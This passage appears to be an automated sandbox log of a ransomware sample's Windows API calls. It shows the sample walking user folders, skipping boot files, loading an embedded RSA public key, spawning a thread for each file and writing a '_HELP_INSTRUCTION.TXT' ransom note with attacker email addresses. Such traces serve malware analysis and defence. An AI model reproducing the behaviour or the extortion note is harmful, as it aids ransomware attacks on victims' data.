hTemplateFile=0x0) returned 0x628 [0127.896] WriteFile (in: hFile=0x628, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0127.896] CloseHandle (hObject=0x628) returned 1 [0127.897] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde1d8 [0127.897] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="Saved Games" [0127.897] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0127.897] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0127.897] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0127.897] FindNextFileW (in: hFindFile=0x3cde1d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.897] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0127.897] FindNextFileW (in: hFindFile=0x3cde1d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.897] FindNextFileW (in: hFindFile=0x3cde1d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.897] FindNextFileW (in: hFindFile=0x3cde1d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0127.897] FindClose (in: hFindFile=0x3cde1d8 | out: hFindFile=0x3cde1d8) returned 1 [0127.897] FindClose (in: hFindFile=0x3cde1d8 | out: hFindFile=0x3cde1d8) returned 0 [0127.897] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0127.897] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0127.897] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0127.897] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0127.898] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0127.898] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Searches" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0127.898] SetErrorMode (uMode=0x1) returned 0x1 [0127.898] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0127.898] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0127.898] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0127.898] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0127.898] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde298 [0127.941] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="Searches" [0127.941] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0127.941] FindNextFileW (in: hFindFile=0x3cde298, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.941] FindNextFileW (in: hFindFile=0x3cde298, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.941] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0127.942] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0127.942] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0127.942] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0127.942] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0127.942] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0127.942] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0127.942] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="Desktop") returned 0x0 [0127.942] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="DESKTOP") returned 0x0 [0127.942] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 43 [0127.942] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0127.942] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0127.942] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0127.942] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x640 [0127.942] Sleep (dwMilliseconds=0x96) [0128.114] FindNextFileW (in: hFindFile=0x3cde298, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0128.114] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="..") returned 1 [0128.114] lstrcmpW (lpString1="Everywhere.search-ms", lpString2=".") returned 1 [0128.114] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0128.114] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="ntldr") returned 0x0 [0128.114] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="NTLDR") returned 0x0 [0128.114] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="NTDETECT.COM") returned 0x0 [0128.114] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="ntdetect.com") returned 0x0 [0128.114] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="Desktop") returned 0x0 [0128.114] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="DESKTOP") returned 0x0 [0128.114] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 43 [0128.114] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0128.114] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0128.114] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0128.114] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x62c [0128.114] Sleep (dwMilliseconds=0x96) [0128.284] FindNextFileW (in: hFindFile=0x3cde298, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0128.284] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="..") returned 1 [0128.284] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2=".") returned 1 [0128.284] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0128.284] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="ntldr") returned 0x0 [0128.284] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="NTLDR") returned 0x0 [0128.284] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="NTDETECT.COM") returned 0x0 [0128.284] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="ntdetect.com") returned 0x0 [0128.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="Desktop") returned 0x0 [0128.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="DESKTOP") returned 0x0 [0128.285] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 43 [0128.285] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0128.285] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0128.285] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0128.285] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x64c [0128.285] Sleep (dwMilliseconds=0x96) [0128.440] FindNextFileW (in: hFindFile=0x3cde298, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0128.440] FindClose (in: hFindFile=0x3cde298 | out: hFindFile=0x3cde298) returned 1 [0128.440] FindClose (in: hFindFile=0x3cde298 | out: hFindFile=0x3cde298) returned 0 [0128.441] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0128.441] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0128.441] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="Desktop") returned 0x0 [0128.441] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="DESKTOP") returned 0x0 [0128.441] SetErrorMode (uMode=0x1) returned 0x1 [0128.441] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\_HELP_INSTRUCTION.TXT") returned 60 [0128.441] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0128.441] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0128.441] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x644) returned 0x0 [0128.441] RegQueryValueExW (in: hKey=0x644, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3ce9b40, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3ce9b40*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0128.441] RegCloseKey (hKey=0x644) returned 0x0 [0128.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0128.441] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0128.441] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0128.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0128.442] WriteFile (in: hFile=0x644, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0128.443] CloseHandle (hObject=0x644) returned 1 [0128.443] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde298 [0128.443] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="Searches" [0128.443] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0128.443] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0128.443] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0128.443] FindNextFileW (in: hFindFile=0x3cde298, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0128.443] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0128.443] FindNextFileW (in: hFindFile=0x3cde298, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0128.443] FindNextFileW (in: hFindFile=0x3cde298, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0128.443] FindNextFileW (in: hFindFile=0x3cde298, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0128.443] FindNextFileW (in: hFindFile=0x3cde298, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0128.443] FindNextFileW (in: hFindFile=0x3cde298, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0128.443] FindClose (in: hFindFile=0x3cde298 | out: hFindFile=0x3cde298) returned 1 [0128.443] FindClose (in: hFindFile=0x3cde298 | out: hFindFile=0x3cde298) returned 0 [0128.444] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0128.444] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0128.444] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0128.444] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0128.444] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0128.444] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="SendTo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0128.444] SetErrorMode (uMode=0x1) returned 0x1 [0128.444] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0128.444] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" [0128.444] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" [0128.444] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*" [0128.444] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0128.444] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0128.444] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0128.444] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*" [0128.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="Desktop") returned 0x0 [0128.444] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="DESKTOP") returned 0x0 [0128.444] SetErrorMode (uMode=0x1) returned 0x1 [0128.444] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\_HELP_INSTRUCTION.TXT") returned 58 [0128.444] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0128.445] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0128.445] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x638) returned 0x0 [0128.445] RegQueryValueExW (in: hKey=0x638, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3ce9d70, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3ce9d70*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0128.445] RegCloseKey (hKey=0x638) returned 0x0 [0128.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0128.445] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0128.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0128.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0128.466] WriteFile (in: hFile=0x648, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0128.466] CloseHandle (hObject=0x648) returned 1 [0128.467] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0128.467] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0128.467] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0128.467] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0128.467] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0128.467] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: 